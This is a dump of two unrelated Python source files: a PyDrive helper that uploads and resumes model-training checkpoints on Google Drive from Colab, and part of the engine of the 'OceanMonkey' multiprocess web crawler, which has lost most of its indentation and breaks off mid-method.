    self.thread_running = False
|
drive_manager.py | """
********************************
* Created by mohammed-alaa *
********************************
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
DISCLAIMER:
this class can access/delete/create your drive account by providing a credentials file >not< your mail and PW of course
You have to revise this class to make sure it doesn't do any illegal things to your data >> it's really safe don't worry :)
********************************
drive manager: connects with drive api on colab which have very high speed network :D 30 MBps :D
You need credentials files from drive api
This can upload and download files from your drive and save check points while training on Colab efficiently and resume your training on any other machine :3
IMPORTANT these files are confidential don't share them or they have control on your drive account !
********************************
To use this:
1.just create a folder on your drive and replace personal_dfolder
you need to know base_download_dfolder is owned by mohammed.a.elkomy and you can access all of its public experiments (the code can access it and you can resume from my experiments :D)
2.obtain your credential file/files and name them as cred* for example cred1.txt cred_mohammed.txt or any thing cred*.txt
3.you can use multiple credentials files = multiple drive accounts which matches cred*
4.it will automatically push your checkpoints regularly to your personal_dfolder and it can if needed download experiments from base_download_dfolder
********************************
"""
import glob
import os
import shutil
import threading
import time
import zipfile
from pydrive.auth import GoogleAuth # from google
from pydrive.drive import GoogleDrive # from google
from utils.zip_manager import ZipFile
class DriveManager:
    """Sync training checkpoints with Google Drive via PyDrive.

    Uploads go to the user's personal folder (``personal_dfolder``) using
    the least-used credentials account; downloads may also come from a
    shared, read-only experiments folder (``base_download_dfolder``).
    """

    # check projects directories
    def __init__(self, project_name,
                 personal_dfolder="1XsSo6zR8bRlDfy7n40NirKNNBdxVh5nE",  # your folder the code can read and write to it using your own credentials
                 base_download_dfolder="1B82anWV8Mb4iHYmOp9tIR9aOTlfllwsD",  # my folder..the code have read access to it(public)..don't change this <<<
                 cred_dir='./utils'
                 ):
        # ----------------------------------------------------------------------------------------
        # Authenticate and create the PyDrive client.
        # This only needs to be done once per notebook.
        gauth = GoogleAuth()
        self.cred_files = sorted(glob.glob(os.path.join(cred_dir, "cred*")))
        gauth.LoadCredentialsFile(self.cred_files[0])  # primary credentials file
        print("Using {} as the main credentials file".format(self.cred_files[0]))
        self.drive = GoogleDrive(gauth)
        self.base_projects_dfolder = base_download_dfolder  # this contains my experiments
        self.personal_dfolder = personal_dfolder  # make your own projects folder
        self.project_name = project_name
        self.cred_dir = cred_dir
        # Creates the project folder on first use and caches its Drive ids.
        self.project_id = self.make_sure_project()
        print("Total Available space from my drive", self.available_space())

    def get_projects_list(self, base_folder):
        """Return all non-trashed subfolders of *base_folder*."""
        return self.drive.ListFile({'q': 'trashed=false and "{}" in parents and mimeType = "application/vnd.google-apps.folder"'.format(base_folder)}).GetList()

    def is_project_exists(self, project_name):
        """Check whether *project_name* exists in the shared and personal folders."""
        komy_projects_list = self.get_projects_list(self.base_projects_dfolder)
        my_projects_list = self.get_projects_list(self.personal_dfolder)
        return {"owned by komy": len(list(file for file in komy_projects_list if file["title"] == project_name)) > 0,
                "owned by me": len(list(file for file in my_projects_list if file["title"] == project_name)) > 0,
                }

    def make_sure_project(self):
        """Create the project folder under the personal folder if missing.

        Returns {'owned by komy': id_or_None, 'owned by me': id}.
        """
        if not self.is_project_exists(self.project_name)["owned by me"]:
            print("Creating new project:", self.project_name)
            # BUGFIX: "kind" was "self.drive#fileLink" (bad find/replace);
            # the Drive API expects "drive#fileLink" (cf. _upload_file).
            folder_metadata = {'title': self.project_name, 'mimeType': 'application/vnd.google-apps.folder', "parents": [{"kind": "drive#fileLink", "id": self.personal_dfolder}]}
            folder = self.drive.CreateFile(folder_metadata)
            folder.Upload()
            time.sleep(10)  # make sure it's created (Drive propagation delay)
        komy_projects_list = self.get_projects_list(self.base_projects_dfolder)
        is_new_to_komy = len(list(file for file in komy_projects_list if file["title"] == self.project_name)) == 0
        my_projects_list = self.get_projects_list(self.personal_dfolder)
        return {"owned by komy": None if is_new_to_komy else list(file for file in komy_projects_list if file["title"] == self.project_name)[0]['id'],
                "owned by me": list(file for file in my_projects_list if file["title"] == self.project_name)[0]['id'],
                }

    def available_space(self):
        """Total free space (GB) summed over all credential accounts.

        NOTE(review): assumes every account has a 15 GB quota — confirm.
        """
        return sum(map(lambda item: 15 - item[1], self.used_per_account()))

    def used_per_account(self):
        """Return [(cred_file, used_GB)] sorted by ascending usage."""
        used_space = []
        for chosen_cred in self.cred_files:
            gauth = GoogleAuth()
            gauth.LoadCredentialsFile(chosen_cred)
            drive = GoogleDrive(gauth)
            total = 0
            # Only files owned by this account count against its quota.
            for i in drive.ListFile({'q': "mimeType != 'application/vnd.google-apps.folder' and 'me' in owners"}).GetList():
                if "fileSize" in i.keys():
                    total += int(i["fileSize"])
            total /= 1024 ** 3  # bytes -> GB
            used_space.append((chosen_cred, total))
        return sorted(used_space, key=lambda item: item[1])

    def search_file(self, file_name):
        """Find *file_name* in both the personal and the shared project folder."""
        return self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(file_name, self.project_id["owned by me"])}).GetList() + \
               self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(file_name, self.project_id["owned by komy"])}).GetList()

    def search_folder(self, folder_name):
        """Find subfolder *folder_name* in both project folders."""
        return self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(folder_name, self.project_id["owned by me"])}).GetList() + \
               self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(folder_name, self.project_id["owned by komy"])}).GetList()

    def _upload_file(self, file_path):
        """Upload *file_path* to the personal project folder.

        Side effect: rebinds self.drive to the least-used credentials
        account so future calls spread quota usage.
        """
        chosen_cred, _ = self.used_per_account()[0]
        gauth = GoogleAuth()
        gauth.LoadCredentialsFile(chosen_cred)
        self.drive = GoogleDrive(gauth)
        upload_started = time.time()
        title = os.path.split(file_path)[-1]
        uploaded = self.drive.CreateFile({'title': title, "parents": [{"kind": "drive#fileLink", "id": self.project_id["owned by me"]}]})
        uploaded.SetContentFile(file_path)  # file on disk
        uploaded.Upload()
        print("cred file", chosen_cred)
        self.log_upload_drive(uploaded.get('id'), title, upload_started)

    def upload_project_files(self, files_list, snapshot_name, dir_list=None):
        """
        Compresses list of files/dirs and upload them asynchronously to drive as .zip
        """
        if dir_list is None:
            dir_list = []
        snapshot_name += ".zip"

        def upload_job():
            """
            uploads single zip file containing checkpoint/logs
            """
            snapshot_zip = ZipFile(snapshot_name)
            for file in files_list:
                snapshot_zip.add_file(file)
            for dir in dir_list:
                snapshot_zip.add_directory(dir)
            snapshot_zip.print_info()
            snapshot_zip.zipf.close()  # now i can upload
            self._upload_file(snapshot_name)
            # Best-effort cleanup of the zipped directories.
            try:
                for dir in dir_list:
                    shutil.rmtree(dir)
            except OSError:
                pass

        upload_thread = threading.Thread(target=upload_job)
        upload_thread.start()

    def upload_project_file(self, file_path):
        """
        upload a file asynchronously to drive
        """
        upload_thread = threading.Thread(target=lambda: self._upload_file(file_path))
        upload_thread.start()

    def download_file(self, file_id, save_path, unzip=True, replace=True):
        """Download *file_id* to *save_path*; optionally unzip into CWD.

        With replace=False an existing file is kept and the download gets a
        numeric suffix (".1", ".2", ...). Returns the actual save path.
        """
        download_started = time.time()
        downloaded = self.drive.CreateFile({'id': file_id})
        if not replace:
            if os.path.isfile(save_path):
                local_files = glob.glob(save_path + ".*")
                if local_files:
                    last = int(sorted(
                        glob.glob(save_path + ".*"), key=lambda path: int(path.split(".")[-1])
                    )[-1].split(".")[-1])
                    save_path += "." + str(last + 1)
                else:
                    save_path += ".1"
        downloaded.GetContentFile(save_path)  # Download file and save locally
        if unzip:
            with zipfile.ZipFile(save_path, 'r') as zip_ref:
                zip_ref.extractall('.')
        self.log_download_drive(downloaded['id'], downloaded['title'], save_path, download_started)
        return save_path

    def download_project_files(self, unzip=False, replace=True):
        """Download all snapshots, preferring my copies over the shared ones."""
        my_project_files = self.list_project_files_owned_by_me()
        if my_project_files:
            project_files = my_project_files
        else:
            project_files = self.list_project_files_owned_by_komy()
        self.download_files_list(project_files, unzip, replace)

    def download_files_list(self, project_files, unzip, replace):
        """Download every Drive file object in *project_files*."""
        id_name_list = []
        for project_file in project_files:
            id_name_list.append((project_file["id"], project_file["title"]))
        for file_id, file_path in id_name_list:
            self.download_file(file_id, file_path, unzip, replace)

    def list_project_files_owned_by_komy(self):
        """Files in the shared project folder (empty if project not shared)."""
        if self.project_id["owned by komy"] is None:
            return []
        return self.drive.ListFile({'q': "trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(self.project_id["owned by komy"])}).GetList()

    def list_project_files_owned_by_me(self):
        """Files in my personal project folder."""
        return self.drive.ListFile({'q': "trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(self.project_id["owned by me"])}).GetList()

    def list_project_files_owned_by_this_cred_file(self, drive):
        """Project files owned by the account behind *drive*."""
        return drive.ListFile({'q': "mimeType != 'application/vnd.google-apps.folder' and '{}' in parents and 'me' in owners".format(self.project_id["owned by me"])}).GetList()

    def delete_project_files(self):
        """Delete every project file from every account, then the folder itself."""
        for chosen_cred in self.cred_files:
            gauth = GoogleAuth()
            gauth.LoadCredentialsFile(chosen_cred)
            drive = GoogleDrive(gauth)
            for project_file in self.list_project_files_owned_by_this_cred_file(drive):
                project_file.Delete()
                print(project_file["title"], "deleted")
        project_folder = self.drive.CreateFile({'id': self.project_id["owned by me"]})
        project_folder.Delete()

    def list_projects(self):
        """All project folders in the shared and personal base folders."""
        return {"owned by komy": self.drive.ListFile({'q': "trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(self.base_projects_dfolder)}).GetList(),
                "owned by me": self.drive.ListFile({'q': "trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(self.personal_dfolder)}).GetList(),
                }

    def get_latest_snapshot_meta(self):
        """Return (found, title, file_id) for the first snapshot, preferring mine.

        Hoisted: the original called each ``list_*`` network round trip up
        to three times.
        """
        mine = self.list_project_files_owned_by_me()
        if mine:
            return True, mine[0]['title'], mine[0]['id']
        shared = self.list_project_files_owned_by_komy()
        if shared:
            return True, shared[0]['title'], shared[0]['id']
        return False, None, None

    def get_latest_snapshot(self):
        """Download the latest snapshot if one exists; returns (found, path)."""
        if_possible, save_path, file_id = self.get_latest_snapshot_meta()
        if if_possible:
            save_path = self.download_file(file_id, save_path)
        return if_possible, save_path

    def time_taken(self, start, end):
        """Split an elapsed interval into whole (hours, minutes, seconds)."""
        hours, rem = divmod(end - start, 3600)
        minutes, seconds = divmod(rem, 60)
        return int(hours), int(minutes), int(seconds)

    def log_download_drive(self, _id, title, saved_as, download_start_time):
        """Print a timing/summary line for a finished download."""
        hours, minutes, seconds = self.time_taken(download_start_time, time.time())
        print("Took {:0>2}:{:0>2}:{:0>2} to ".format(hours, minutes, seconds), end="")
        print('Download and unzipped file with ID:{}, titled:{}, saved as:{}'.format(_id, title, saved_as))
        print("*" * 100)

    def log_upload_drive(self, _id, title, upload_start_time):
        """Print a timing/summary line for a finished upload."""
        hours, minutes, seconds = self.time_taken(upload_start_time, time.time())
        print("Took {:0>2}:{:0>2}:{:0>2} to ".format(hours, minutes, seconds), end="")
        print('Upload file with ID:{}, titled:{}'.format(_id, title))
        print("*" * 100)
if __name__ == '__main__':
    # Ad-hoc smoke test / scratchpad for DriveManager.
    # BUGFIX: pprint was used below but never imported anywhere in the
    # module; import it locally so the inspection code works once the
    # `continue` is removed.
    import pprint

    # "mot-xception-adam-5e-05-imnet"
    # "mot-xception-adam-5e-06-imnet"
    # "spa-xception-adam-5e-06-imnet"
    # spa-xception-adam-5e-05-imnet
    print(sorted(glob.glob("utils/cred*")))
    for project in ["heavy-spa-xception-adam-1e-05-imnet"]:
        drive_manager = DriveManager(project, cred_dir="utils")  # , "credentials{}.txt"
        print(drive_manager.list_projects())
        continue  # deliberately skips the detailed inspection below
        # drive_manager.upload_file("150-0.86043-0.85858.zip")
        # drive_manager.upload_file("155-0.86043-0.85937.zip")
        # for i in drive_manager.list_projects():
        #     print(
        #         i['title']
        #     )
        # drive_manager.download_project_files(unzip=False)
        pprint.pprint(drive_manager.used_per_account())
        print(
            drive_manager.available_space()
        )
        # drive_manager.delete_project_files()
        print(
            drive_manager.available_space()
        )
        print(
            drive_manager.list_project_files_owned_by_komy())
        print(
            drive_manager.list_project_files_owned_by_me()
        )
        print(
            drive_manager.list_project_files_owned_by_this_cred_file(drive_manager.drive)
        )
|
engine.py | """
This is the OceanMonkey engine which controls all the monkeys to crawling data
"""
import time
import importlib
import multiprocessing
import copy
import pickle
import threading
import asyncio
from threading import Lock, Condition
from oceanmonkey.core.monkey import MonkeyType
from oceanmonkey.core.request import Request
from oceanmonkey.core.response import Response
from oceanmonkey.utils.settings.filters import FilterType
from oceanmonkey.utils.settings.time import TimeType
from oceanmonkey.utils.settings import SettingsType
from oceanmonkey.utils.settings import SimpleSettingsFactory
from oceanmonkey.core.queue import SimpleQueueFactory
from oceanmonkey.core.queue import QueueType
from oceanmonkey.core.signal import SignalValue, Signal
from oceanmonkey.utils import current_frame
from oceanmonkey.utils.url import domain
from oceanmonkey.utils import queues as Queues
from oceanmonkey.utils.log import logger
from oceanmonkey.utils import bye
class OceanMonkey:
__instance = None
LOCAL = 0
CLUSTER = 1
def __new__(cls, *args, **kwargs):
if not cls.__instance:
cls.__instance = super().__new__(cls)
return cls.__instance
def __init__(self, settings_path=None):
self.__monkeys = {
MonkeyType.MACAQUE: self._consume_seeds,
MonkeyType.GIBBON: self._consume_sources,
}
self.__settings_path = settings_path
self.__settings = importlib.import_module(settings_path)
self.__seed_queues = []
self.__source_queues = []
self.__macaque_monkeys = []
self.__gibbon_monkeys = []
self.__monkey_queues = {}
self.__seeds_lock = Lock()
self.__source_lock = Lock()
@property
def settings(self):
return self.__settings
@staticmethod
def _receive_a_goodbye_signal(value):
goodbye = False
try:
may_be_signal = pickle.loads(value)
if isinstance(may_be_signal, (Signal,)) and may_be_signal.value == SignalValue.SAY_GOODBYE:
goodbye = True
except (KeyError,):
pass
return goodbye
@staticmethod
def _is_alive(monkeys):
is_alive = False
for monkey in monkeys:
if monkey.is_alive():
is_alive = True
break
return is_alive
@staticmethod
def _produce_seeds(settings_path, seeds_queue, macaque_queues, monkeys, seeds_lock):
settings = importlib.import_module(settings_path)
settings_factory = SimpleSettingsFactory(settings)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
seeds_settings = settings_factory.get(SettingsType.SEEDS)
seeds_key = seeds_settings.get()
macaques = monkey_settings.has(MonkeyType.MACAQUE)
time_settings = settings_factory.get(SettingsType.TIME)
max_idle_time = time_settings.get()
while True:
logger.info("Getting seed from seeds queue:{}".format(seeds_queue.info()))
value, timeout = seeds_queue.get(keys=seeds_key, timeout=max_idle_time)
if timeout:
logger.info("Macaque for seeds closed because of timeout")
break
if not OceanMonkey._is_alive(monkeys):
seeds_queue.put(value)
logger.info("Macaque for seeds closed because of there are no monkeys")
break
if OceanMonkey._receive_a_goodbye_signal(value):
logger.info("Macaque for seeds closed because of receiving the goodbye's signal")
break
logger.info("Seed produced from seeds queue:{}".format(seeds_queue.info()))
seeds_lock.acquire() if macaques > 1 else None
"""
choose the backend's monkey with round robin.
the first element of monkey_queues indicates the backend monkey queues' index
e.g.: [1, queue, queue,...]
"""
macaque_queue = Queues.next_queue(macaque_queues)
seeds_lock.release() if macaques > 1 else None
macaque_queue.put(value) if macaque_queue else bye.bye("You must configure at least one macaque",
fn=__name__, lno=current_frame().f_lineno)
logger.info("Transfer seed to macaque monkey".format(value))
@staticmethod
def _produce_source(settings_path, source_queue, gibbon_queues, monkeys, source_lock):
settings = importlib.import_module(settings_path)
settings_factory = SimpleSettingsFactory(settings)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
source_settings = settings_factory.get(SettingsType.SOURCE)
source_key = source_settings.get()
gibbons = monkey_settings.has(MonkeyType.GIBBON)
time_settings = settings_factory.get(SettingsType.TIME)
max_idle_time = time_settings.get()
while True:
logger.info("Getting source from source queue:{}".format(source_queue.info()))
value, timeout = source_queue.get(keys=source_key, timeout=max_idle_time)
if timeout:
logger.info("Gibbon for source closed because of timeout")
break
if not OceanMonkey._is_alive(monkeys):
source_queue.put(value)
logger.info("Gibbon for source closed because of there are no monkeys")
break
if OceanMonkey._receive_a_goodbye_signal(value):
logger.info("Gibbon for source closed because of receiving the goodbye's signal")
break
logger.info("Source produced from source queue:{}".format(source_queue.info()))
source_lock.acquire() if gibbons > 1 else None
"""
choose the backend's monkey with round robin.
the first element of monkey_queues indicates the backend monkey queues' index
e.g.: [1, queue, queue, ...]
"""
gibbon_queue = Queues.next_queue(gibbon_queues)
source_lock.release() if gibbons > 1 else None
gibbon_queue.put(value) if gibbon_queue else bye.bye("You must configure at least one gibbon",
fn=__name__, lno=current_frame().f_lineno)
logger.info("Produce page source to gibbon monkey")
@staticmethod
def _consume_seeds(settings_path, macaque_queue, gibbon_queues):
settings = importlib.import_module(settings_path)
seeds = []
seeds_waiter = Condition(Lock())
seed_queues = SimpleQueueFactory.get_queues(settings, QueueType.SEEDS)
source_queues = SimpleQueueFactory.get_queues(settings, QueueType.SOURCE)
settings_factory = SimpleSettingsFactory(settings)
concurrency_settings = settings_factory.get(SettingsType.CONCURRENCY)
deploy_settings = settings_factory.get(SettingsType.DEPLOY)
filter_settings = settings_factory.get(SettingsType.FILTERS)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
headers_settings = settings_factory.get(SettingsType.HEADERS)
middleware_settings = settings_factory.get(SettingsType.MIDDLEWARE)
seeds_settings = settings_factory.get(SettingsType.SEEDS)
source_settings = settings_factory.get(SettingsType.SOURCE)
time_settings = settings_factory.get(SettingsType.TIME)
has_gibbon = monkey_settings.has(MonkeyType.GIBBON)
has_macaque = monkey_settings.has(MonkeyType.MACAQUE)
request_dup_filter = filter_settings.get(FilterType.REQUEST_FILTER)
source_dup_filter = filter_settings.get(FilterType.SOURCE_FILTER)
max_idle_time = time_settings.get()
crawling_delay = time_settings.get(TimeType.DELAY)
seeds_key = seeds_settings.get()
source_key = source_settings.get()
queue_timeout, max_seeds_size, max_buffer_time = concurrency_settings.get()
download_middlewares = middleware_settings.get(MonkeyType.MACAQUE)
deploy_mode = deploy_settings.get()
gibbons = monkey_settings.get(MonkeyType.GIBBON)
orangutans = monkey_settings.get(MonkeyType.ORANGUTAN)
[orangutan.when_wake_up() for orangutan in orangutans]
logger.info("MACAQUE's domain: All Orangutans woke up, waiting for processing page source's items") \
if len(orangutans) > 0 else None
async def __gather(requests):
__results = await asyncio.gather(*requests)
return [Response(url=result[0], page_source=result[1], status_code=result[2]) for result in __results]
def __prepare(requests):
for request in requests:
__headers = headers_settings.get()
request.add_headers(__headers) if __headers else None
for download_middleware in download_middlewares:
for request in requests:
if hasattr(download_middleware, "prepare"):
download_middleware.prepare(request)
def __do_request(requests):
__responses = []
for download_middleware in download_middlewares:
if not hasattr(download_middleware, "on_request"):
continue
for request in requests:
time.sleep(crawling_delay) if crawling_delay > 0 else None
if hasattr(download_middleware, "on_request"):
__response = download_middleware.on_request(request)
if not isinstance(__response, Response):
logger.warning("The download middleware must provide "
"the on_request method and return a Response object")
break
__responses.append(__response)
break
if not __responses:
__async_requests = []
for request in requests:
time.sleep(crawling_delay) if crawling_delay > 0 else None
__async_requests.append(request.do_request())
__responses = asyncio.run(__gather(__async_requests)) if len(__async_requests) > 0 else []
return __responses
def __on_request_finished(responses):
for download_middleware in download_middlewares:
for response in responses:
if hasattr(download_middleware, "on_finish"):
download_middleware.on_finish(response)
def __transfer(values):
__serve_forever = True
for value in values:
if isinstance(value, (Request,)):
if deploy_mode == OceanMonkey.LOCAL:
if value.refuse_filter or not request_dup_filter.seen(value, local=True):
macaque_queue.put(pickle.dumps(value))
elif deploy_mode == OceanMonkey.CLUSTER:
__seed_queue = Queues.next_queue(seed_queues)
if not request_dup_filter.server:
request_dup_filter.server = __seed_queue.server
if value.refuse_filter or not request_dup_filter.seen(value):
__seed_queue.put(pickle.dumps(value), keys=seeds_key)
elif isinstance(value, (Signal, )):
macaque_queue.put(pickle.dumps(value))
else:
[orangutan.process_item(value) for orangutan in orangutans]
return __serve_forever
def __schedule(requests):
__responses = __do_request(requests)
__on_request_finished(__responses)
for index, response in enumerate(__responses):
__responses[index].meta = requests[index].meta
__responses[index].callback = requests[index].callback
if deploy_mode == OceanMonkey.LOCAL:
if has_gibbon:
for response in __responses:
if source_dup_filter.seen(response, local=True):
response.repeated = True
logger.info("Ocean Monkey work in local mode and there is gibbon, "
"just transfer response to gibbon queue")
gibbon_queue = Queues.next_queue(gibbon_queues)
gibbon_queue.put(pickle.dumps(response.get_init_args())) if gibbon_queue \
else bye.bye("You must configure at least one gibbon",
fn=__name__, lno=current_frame().f_lineno)
elif has_macaque:
for __response in __responses:
if source_dup_filter.seen(__response, local=True):
__response.repeated = True
logger.info("Ocean Monkey work in local mode and there is only macaque,"
"just play the role of gibbon")
if not __response.callback:
__response_coroutine = None
for gibbon in gibbons:
if hasattr(gibbon, "allowed_domains"):
if domain(__response.url) in gibbon.allowed_domains:
__response_coroutine = gibbon.parse(__response)
else:
__response_coroutine = gibbon.parse(__response)
results = [result for result in __response_coroutine] if __response_coroutine else []
__transfer(results)
else:
__response_coroutine = __response.parse(__response)
__results = [result for result in __response_coroutine]
__transfer(__results)
elif deploy_mode == OceanMonkey.CLUSTER:
if has_gibbon:
for __response in __responses:
__source_queue = Queues.next_queue(source_queues)
if not source_dup_filter.server:
source_dup_filter.server = __source_queue.server
if source_dup_filter.seen(__response):
__response.repeated = True
logger.info("Ocean Monkey work in cluster mode and there is gibbon,"
"just transfer response to gibbon queue")
__include_page_source = True if not __response.repeated else False
__gibbon_queue = Queues.next_queue(gibbon_queues)
__gibbon_queue.put(pickle.dumps(__response.get_init_args(
include_page_source=__include_page_source))) if __gibbon_queue else \
bye.bye("You must configure at least one gibbon", fn=__name__, lno=current_frame().f_lineno)
else:
for __response in __responses:
__source_queue = Queues.next_queue(source_queues)
if not source_dup_filter.server:
source_dup_filter.server = __source_queue.server
if source_dup_filter.seen(__response):
__response.repeated = True
logger.info("Ocean Monkey work in cluster mode and there is only macaque,"
"just transfer response to server's source queue")
__include_page_source = True if not __response.repeated else False
__source_queue.put(pickle.dumps(__response.get_init_args(
include_page_source=__include_page_source)), keys=source_key)
def __consume():
__serve_forever = True
idle_time = 0
while __serve_forever:
seeds_waiter.acquire()
try:
__value = macaque_queue.get(timeout=queue_timeout)
idle_time = 0
except(Exception, ):
idle_time += queue_timeout
if max_idle_time is not None and idle_time >= max_idle_time:
say_goodbye_signal = pickle.dumps(Signal(SignalValue.TOO_IDLE))
seeds.append(say_goodbye_signal)
logger.info("Macaque was fired for being too idle")
seeds_waiter.notify()
seeds_waiter.release()
break
seeds_waiter.release()
continue
seeds.append(__value)
if len(seeds) >= max_seeds_size:
seeds_waiter.notify()
seeds_waiter.release()
def __batch_download():
__serve_forever = True
__excluding_domains_cache = {None, }
while __serve_forever:
seeds_waiter.acquire()
if len(seeds) < max_seeds_size:
seeds_waiter.wait(timeout=max_buffer_time)
__seeds_copy = copy.deepcopy(seeds) if seeds else []
seeds.clear() if seeds else None
seeds_waiter.release()
__http_requests = []
for __value in __seeds_copy:
try:
__value = pickle.loads(__value)
if isinstance(__value, (Request, )):
__http_requests.append(__value) if domain(__value.url) not in __excluding_domains_cache else None
elif isinstance(__value, (Signal, )):
if __value.value == SignalValue.SAY_GOODBYE:
__excluding_domains_cache.add(domain(__value.url))
elif __value.value == SignalValue.TOO_IDLE:
__serve_forever = False
break
except (KeyError,):
__url = __value.decode() if isinstance(__value, bytes) else None
__http_requests.append(Request(url=__url)) if domain(__url) not in __excluding_domains_cache else None
__prepare(__http_requests)
__schedule(__http_requests)
_threads = [threading.Thread(target=__consume), threading.Thread(target=__batch_download)]
[_thread.start() for _thread in _threads]
[_thread.join() for _thread in _threads]
[orangutan.when_sleep() for orangutan in orangutans]
@staticmethod
def _consume_sources(settings_path, gibbon_queue, macaque_queues):
settings = importlib.import_module(settings_path)
serve_forever = True
seed_queues = SimpleQueueFactory.get_queues(settings, QueueType.SEEDS)
settings_factory = SimpleSettingsFactory(settings)
deploy_settings = settings_factory.get(SettingsType.DEPLOY)
filter_settings = settings_factory.get(SettingsType.FILTERS)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
seeds_settings = settings_factory.get(SettingsType.SEEDS)
time_settings = settings_factory.get(SettingsType.TIME)
max_idle_time = time_settings.get()
deploy_mode = deploy_settings.get()
request_dup_filter = filter_settings.get(FilterType.REQUEST_FILTER)
gibbons = monkey_settings.get(MonkeyType.GIBBON)
orangutans = monkey_settings.get(MonkeyType.ORANGUTAN)
[orangutan.when_wake_up() for orangutan in orangutans]
logger.info("GIBBON's domain: All Orangutans woke up, waiting for processing page source's items") \
if len(orangutans) > 0 else None
def __schedule(values):
for value in values:
if isinstance(value, (Request,)):
if deploy_mode == OceanMonkey.LOCAL:
if value.refuse_filter or not request_dup_filter.seen(value, local=True):
__macaque_queue = Queues.next_queue(macaque_queues)
logger.info("Transfer Request <{}> to Macaque queue".format(value.url))
__macaque_queue.put(pickle.dumps(value)) if __macaque_queue else None
elif deploy_mode == OceanMonkey.CLUSTER:
__seed_queue = Queues.next_queue(seed_queues)
if not request_dup_filter.server:
request_dup_filter.server = __seed_queue.server
if value.refuse_filter or not request_dup_filter.seen(value):
__seed_queue.put(pickle.dumps(value), keys=seeds_settings.get())
elif isinstance(value, (Signal, )):
if value.value == SignalValue.SAY_GOODBYE:
logger.info("Gibbon receive a say-goodbye's signal on <{}>".format(value.url))
# __serve_forever = False
say_goodbye_signal = pickle.dumps(Signal(SignalValue.SAY_GOODBYE, value.url))
for macaque_queue in Queues.all_queues(macaque_queues):
macaque_queue.put(say_goodbye_signal)
# break
else:
[orangutan.process_item(value) for orangutan in orangutans]
while serve_forever:
logger.info("Getting source from server's source queue or macaque...")
try:
_init_args = pickle.loads(gibbon_queue.get(timeout=max_idle_time))
except (Exception, ):
logger.info("Gibbon was fired for being too idle")
serve_forever = False
continue
_response = Response(**_init_args)
for gibbon in gibbons:
if hasattr(gibbon, "allowed_domains"):
if domain(_response.url) not in gibbon.allowed_domains:
continue
if not _response.callback:
results = gibbon.parse(_response)
else:
results = _response.parse(_response)
__schedule(results) if results else None
[orangutan.when_sleep() for orangutan in orangutans]
def _init_monkey_queues(self):
if not hasattr(self.settings, "MONKEYS"):
bye.bye("You must configure the monkeys in settings.py", fn=__name__, lno=current_frame().f_lineno)
for monkey_type, monkeys in getattr(self.settings, "MONKEYS").items():
if monkey_type not in self.__monkey_queues:
self.__monkey_queues[monkey_type] = [1]
for _ in range(monkeys):
queue = multiprocessing.Queue()
self.__monkey_queues[monkey_type].append(queue)
def __get_monkey_queues(self, monkey_type):
return self.__monkey_queues[monkey_type] if monkey_type in self.__monkey_queues else []
def _launch_monkeys(self):
macaque_queues = self.__get_monkey_queues(MonkeyType.MACAQUE)
gibbon_queues = self.__get_monkey_queues(MonkeyType.GIBBON)
def _launch_macaque_monkeys():
for queue in macaque_queues[1:]:
macaque = multiprocessing.Process(
target=self.__monkeys[MonkeyType.MACAQUE],
args=(self.__settings_path, queue, gibbon_queues))
macaque.start()
self.__macaque_monkeys.append(macaque)
def _launch_gibbon_monkeys():
for queue in gibbon_queues[1:]:
gibbon = multiprocessing.Process(
target=self.__monkeys[MonkeyType.GIBBON],
args=(self.__settings_path, queue, macaque_queues))
gibbon.start()
self.__gibbon_monkeys.append(gibbon)
_launch_macaque_monkeys()
_launch_gibbon_monkeys()
def _wait_for_monkeys(self):
[monkey.join() for monkey in self.__macaque_monkeys]
[monkey.join() for monkey in self.__gibbon_monkeys]
def _init_seed_and_source_queues(self):
self.__seed_queues = SimpleQueueFactory.get_queues(self.settings, QueueType.SEEDS)
self.__source_queues = SimpleQueueFactory.get_queues(self.settings, QueueType.SOURCE)
if not self.__seed_queues and not self.__source_queues:
bye.bye("You must configure the seeds queue or source queue", fn=__name__, lno=current_frame().f_lineno)
    def _init_seed_workers(self):
        """Create (but do not start) one seed-producer thread per seed queue.

        Workers are only created when macaques are configured AND a seeds
        queue exists; otherwise the list stays empty.
        """
        self.__seed_workers = []
        settings_factory = SimpleSettingsFactory(self.settings)
        monkey_settings = settings_factory.get(SettingsType.MONKEY)
        queue_settings = settings_factory.get(SettingsType.QUEUE)
        if monkey_settings.has(MonkeyType.MACAQUE) and queue_settings.has(QueueType.SEEDS):
            # [1:] skips the placeholder element at the head of the queue list.
            for seed_queue in self.__seed_queues[1:]:
                thread = threading.Thread(target=self._produce_seeds,
                    args=(self.__settings_path, seed_queue,
                    self.__monkey_queues[MonkeyType.MACAQUE],
                    self.__macaque_monkeys, self.__seeds_lock))
                self.__seed_workers.append(thread)
    def _init_source_workers(self):
        """Create (but do not start) one source-producer thread per source queue.

        Mirror image of _init_seed_workers for the gibbon/source side.
        """
        self.__source_workers = []
        settings_factory = SimpleSettingsFactory(self.settings)
        monkey_settings = settings_factory.get(SettingsType.MONKEY)
        queue_settings = settings_factory.get(SettingsType.QUEUE)
